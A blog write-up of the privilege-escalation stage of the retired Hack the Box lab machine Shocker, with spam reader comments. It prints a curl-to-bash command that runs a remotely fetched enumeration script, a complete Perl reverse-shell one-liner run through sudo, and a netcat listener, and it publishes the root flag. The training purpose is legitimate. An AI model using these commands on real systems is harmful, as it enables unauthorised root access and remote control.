Hack the Box – Shocker – Part 2 (System Flag)

# Information:

Platform Name: Hack the Box

Machine Challenge: Shocker

Machine Status: Retired

Machine Matrix:

  • Enum: 5.5
  • CTF: 5.1
  • Custom: 3.7
  • CVE: 6.3
  • Real: 4.9

Challenge Level: Easy

Part 2: System Flag

Note: This is the continuation of Hack the Box – Shocker – Part 1 (User Flag). Take a look to the first part!

# Writeup: (Continuation)

Step 1

Okay, we now have access to the terminal of the Shocker machine, but we cannot yet access it as root. After trying to change directory to /root I got: “Permission denied”.

We need a way to escalate privilege and get to root. One such tool is LinEnum.sh.

According to DRD_ at Null Byte: LinEnum is a tool used to Identify Potential Privilege Escalation Vectors.

To be able to run LinEnum and see the results we need to create an HTTP server on our machine, to do so I used python’s SimpleHTTPServer flag, see the command below:

 mregra on Cyber:VM/HTB/Shocker $ python -m SimpleHTTPServer 7777

After starting the HTTP server we can go back to the remote terminal of the Shocker machine and run the command:

 shelly@Shocker:/usr/lib/cgi-bin$ $ curl 10.10.14.26:7777/LinEnum.sh | bash

Which returns a long output, like so:

After analyzing the output I was able to find this:

It seems we can run perl commands and files as root without password!! This is our way in!

Step 2

Now, what we need to do is to create a root reverse shell, to do so let’s go back to Pentestmonkey website and get the perl script.

After getting the script, what I did was I opened a text editor on my VM and pasted the perl script there. I went back to the Shocker remote terminal and did sudo -l with the objective of discovering the full path for perl, which was /usr/bin/perl

Now, let’s go back to the text editor and let’s edit the perl command. The final command:

sudo /usr/bin/perl -e 'use Socket;$i="10.10.14.26";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

The 10.10.14.26 is my VM’s IP, you should change that IP to yours.

As you can see, the port I choose was the one that was already there, 1234.

Once the command was configured to our specific case I went back to my VM’s terminal and executed the command:

 mregra on Cyber:VM/HTB/Shocker $ nc -lvnp 1234

This command, as you know from the previous Shocker post, starts a TCP server on port 1234.

Once this was finished I went back to the Shocker’s remote terminal and run the perl command that I previously configured:

As you can see, after running whoami we get “root”. We succeed on escalating to root!!

After some search I was able to find the flag at /root/root.txt

Show flag
0b78b642d6b346e155b6ad74cf184a06


Thank you very much for reading!

Cheers,

MRegra

Share this post:

Popular posts

4 Replies to “Hack the Box – Shocker – Part 2 (System Flag)”

  1. Does your site have a contact page? I’m having problems locating it
    but, I’d like to shoot you an email. I’ve got some creative ideas for your blog you might
    be interested in hearing. Either way, great blog and I look forward to seeing it develop
    over time.

  2. I know this if off topic but I’m looking into starting my own blog and was curious
    what all is needed to get setup? I’m assuming having a blog like yours would cost a pretty penny?
    I’m not very internet smart so I’m not 100% sure.

    Any suggestions or advice would be greatly appreciated.
    Appreciate it

Leave a Reply

Your email address will not be published. Required fields are marked *